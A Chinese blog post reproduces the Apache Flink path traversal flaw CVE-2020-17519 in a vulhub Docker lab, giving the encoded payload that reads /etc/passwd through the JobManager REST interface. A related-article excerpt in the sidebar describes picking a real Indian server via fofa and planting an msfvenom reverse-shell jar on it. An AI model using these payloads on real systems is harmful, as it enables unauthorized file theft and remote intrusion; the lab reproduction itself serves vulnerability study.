Apache Flink jobmanager/logs 目录穿越漏洞 CVE-2020-17519 漏洞复现

最新推荐文章于 2024-02-23 14:58:59 发布
最新推荐文章于 2024-02-23 14:58:59 发布
阅读量917 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: Apache Flink jobmanager/logs 目录穿越漏洞 CVE-2020-17519 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44037296/article/details/119182793
版权

Apache Flink jobmanager/logs 目录穿越漏洞 CVE-2020-17519 漏洞复现

一、漏洞描述

ApacheFlink是一个开源的流处理框架,具有强大的流处理和批处理功能。
Apache Flink 1.11.0 中引入的更改(以及在 1.11.1 和1.11.2 中发布)允许攻击者通过 JobManager 进程的 REST 接口读取JobManager本地文件系统上的任何文件。
访问仅限于 JobManager 进程可访问的文件。

二、漏洞影响

Apache Flink 1.11.0、Apache Flink 1.11.1、Apache Flink 1.11.2

三、漏洞复现

1、环境搭建

执行以下命令启动 Apache Flink JobManager 1.11.2:

cd vulhub/flink/CVE-2020-17519
docker-compose up -d

Apache Flink 启动后,访问 http://x.x.x.x:8081 查看主页:
在这里插入图片描述

2、漏洞复现

尝试访问/etc/passwd文件,构造Payload:/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
在这里插入图片描述

四、漏洞POC

/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

五、参考链接

https://www.openwall.com/lists/oss-security/2021/01/05/2
https://vulhub.org/#/environments/flink/CVE-2020-17519/

Senimo_
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Apache Flink(CVE-2020-17518/17519)任意文件上传和路径遍历漏洞复现
good good study
01-08 3715
目录 影响范围 docker搭建漏洞环境 漏洞复现 单个漏洞检测脚本 批量漏洞检测脚本 Apache Flink 是一个分布式流批一体化的开源平台。Flink 的核心是一个提供数据分发、通信以及自动容错的流计算引擎。Flink 在流计算之上构建批处理,并且原生的支持迭代计算,内存管理以及程序优化。式的数据分析开源系统,结合了分布式 MapReduce 类平台的高效,灵活的编程和扩展性,具有强大的流处理和批处理功能。同时在并行数据库发现查询优化方案。 2021...
CVECVE-2020-17518 & CVE-2020-17519Flink 任意文件上传 & 未授权访问
边扯边淡
05-09 2555
起序:漏扫完看报告的时候发现的,复现学习一下。 一、靶场环境 使用的是 github 上的 vulhub 环境。因为 Flink 中的 CVE-2020-17518 和 CVE-2020-17519Flink/1.11.2 版本都存在。 vulhub:https://github.com/vulhub/vulhub 1、漏洞描述:任意文件上传 & 未授权访问 CVE 编号 名称 危害 CVE-2020-17518 任意文件上传 应用系统在文件上传功能处对用户上传.
[漏洞预警]Apache Flink 高危漏洞预警(CVE-2020-17518 CVE-2020-17519)
Matrix42
01-07 1879
2021年1月5日,Apache Flink官方发布安全更新,修复了由蚂蚁安全非攻实验室发现提交的2个高危漏洞CVE-2020-17519:攻击者可通过REST API使用…/跳目录实现系统任意文件读取; CVE-2020-17518:通过构造恶意的http header,可实现远程文件写入。 1. 漏洞描述 Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。Flink 1.5.1引入了REST API,但其实现上存在多处缺陷,导致目录遍历
Apache Flink(CVE-2020-17519)路径遍历漏洞复现_附POC和批量检测脚本
szgyunyun的博客
01-06 875
声明 本文仅用于技术交流,请勿用于非法用途 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。 文章作者拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。 Apache Flink 是高效和分布式的通用数据处理平台。 Apache Flink 声明式的数据分析开源系统,结合了分布式 MapReduce 类平台的高效,灵活的
Apache Flink漏洞CVE-2020-17519复现以及suricata规则检测
ranuy阮的博客
01-06 1478
0x01 漏洞简介 Apache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。 Apache Flink 1.11.0中引入的一项更改(包括版本1.11.1和1.11.2)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。 0x02 影响版本 1.11.0 1.11.1 1.11.2 0x03 环境搭建 svn export https://github.com/vulhub/vulhub/trunk/flink/ 进入CVE-2
Apache Flink目录遍历(CVE-2020-17519)批量检测脚本
09-24
2021年1月5日,Apache Flink官方发布安全更新,修复了由蚂蚁安全非攻实验室发现提交的2个高危漏洞漏洞之一就是Apache Flink目录遍历漏洞(CVE-2020-17519)。 Flink核心是一个流式的数据流执行引擎,其针对数据流的...
CVE-2020-17519:Apache Flink 目录遍历漏洞批量检测 (CVE-2020-17519)
05-30
该脚本为Apache Flink 目录遍历漏洞批量检测 (CVE-2020-17519)。 使用方法:Python CVE-2020-17519.py urls.txt urls.txt 中每个url为一行,漏洞地址输出在vul.txt中 影响版本: Apache Flink 1.11.0、1.11.1、...
Apache Flink目录遍历(CVE-2020-17519)单目标检测工具
09-24
2021年1月5日,Apache Flink官方发布安全更新,修复了由蚂蚁安全非攻实验室发现提交的2个高危漏洞漏洞之一就是Apache Flink目录遍历漏洞(CVE-2020-17519)。 Flink核心是一个流式的数据流执行引擎,其针对数据流的...
Apache Flink CVE-2020-17518-id:L.pdf
最新发布
04-30
Apache Flink CVE-2020-17518--id:L.pdf
Apache Flink jobmanager/logs 目录遍历 (CVE-2020-17519)
EC_Carrot的博客
06-04 408
漏洞复现 访问以下网址: http://your-ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd 就能够读取/etc/passwd,我环境出问题了,复现不了…
Apache Flink jobmanager/logs 目录穿越漏洞CVE-2020-17519
weixin_53639243的博客
02-23 230
复现:访问首页exp利用。
CVE-2020-15012:Nexus Repository Manager 2 目录遍历漏洞通告
爱国小白帽
10-09 863
CVE-2020-15012:Nexus Repository Manager 2 目录遍历漏洞通告 原创 360CERT [三六零CERT](javascript:void(0)???? 今天 报告编号:B6-2020-100901 报告来源:360CERT 报告作者:360CERT 更新日期:2020-10-09 0x01 漏洞简述 2020年10月09日,360CERT监测发现 nexus repository manager 2 发布了 nexus repository manager 2 目录穿
Apache Flink 目录遍历漏洞 CVE-2020-17519
m0_54323635的博客
08-31 423
2021年01月06日,360CERT监测发现Apache Flink发布了Apache Flink 目录穿越漏洞的风险通告,漏洞编号为CVE-2020-17518,CVE-2020-17519漏洞等级:高危,漏洞评分:8.5。Apache Flink 1.11.0 中引入的一项更改(也在 1.11.1 和 1.11.2 中发布)允许攻击者通过 JobManager 进程的 REST 接口读取 JobManager 本地文件系统上的任何文件。
Apache Flink jobmanager/logs Path Traversal(CVE-2020-17519)和Nginx 越界读取缓存漏洞漏洞复现
weixin_48739941的博客
04-11 418
1、Apache Flink jobmanager/logs Path Traversal(CVE-2020-17519) (1)漏洞原理 攻击者可以利用 JobManager 的 REST API,读取 JobManager 本地文件系统上的任意文件(JobManager 进程有权限能够读取到的文件)。 (2)修复 升级到1.11.3或1.12.0版本。 (3) cd vulhub/flink/CVE-2020-17519 切换目录。 (4)docker-compose up -d 启动。
Apache Flink CVE-2020-17519/17518 漏洞复现
蚁景网安学院
01-18 761
喜欢就关注我吧,订阅更多最新消息文章字数1507 预计阅读时长7分钟 涉及知识点实操练习-网络安全事件https://www.hetianlab.com/cour.do?w=1&am...
Apache Flink -任意文件读取漏洞CVE-2020-17519
chaojixiaojingang
01-06 1122
1.漏洞描述 Apache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。 Apache Flink 1.11.0中引入的一项更改(包括版本1.11.1和1.11.2)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。 2.影响版本 1.11.0 1.11.1 1.11.2 3.POC /jobmanager/logs/..%252f..%252f..%252f..%252f..%252...
Apache Flink CVE-2020-17519
weixin_45682070的博客
02-04 256
fofa搜索Apache Flink app="APACHE-Flink" &&country="IN" 未授权任意上传jar包导致远程代码执行,找一个阿三的站试试 1:上传生成好的jar包 msfvenom -p java/meterpreter/reverse_tcp LHOST=ip LPORT=4568 -f jar > main.jar 上传jar包之后监听端口 use exploit/multi/handler set payload java/shell/reve
漏洞复现Apache Flink 文件读取(CVE-2020-17519
weixin_43486390的博客
01-07 323
0x01 漏洞描述 ApacheFlink是一个开源的流处理框架,具有强大的流处理和批处理功能。Apache Flink 1.11.0(以及1.11.1和1.11.2中发布的)中引入的更改允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统中的任何文件。 0x02 影响版本 Flink 1.11.0、1.11.1、1.11.2 0x03 漏洞复现 简单验证: 读取该文件可直接判断是否存在漏洞 http://192.168.1.1:8081/jobmanager/logs/
docker-compose.yml 文件中拉取flink容器 版本为1.17.0并在flink包的lib文件夹下加入三个以下三个依赖:https://repo.maven.apache.org/maven2/org/apache/flink/flink-sql-connector-elasticsearch7/3.0.1-1.17/flink-sql-connector-elasticsearch7-3.0.1-1.17.jar、https://repo1.maven.org/maven2/com/ververica/flink-sql-connector-mysql-cdc/2.3.0/flink-sql-connector-mysql-cdc-2.3.0.jar、https://repo1.maven.org/maven2/com/ververica/flink-sql-connector-postgres-cdc/2.3.0/flink-sql-connector-postgres-cdc-2.3.0.jar
06-07
1. 在 `flink-job` 服务中,我们使用了 `volumes` 来挂载 `flink-conf.yaml` 和三个依赖的jar包到容器的 `/opt/flink/conf` 和 `/opt/flink/lib` 目录中。 2. 我们在 `flink-job` 服务的环境变量中设置了 `FLINK_...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值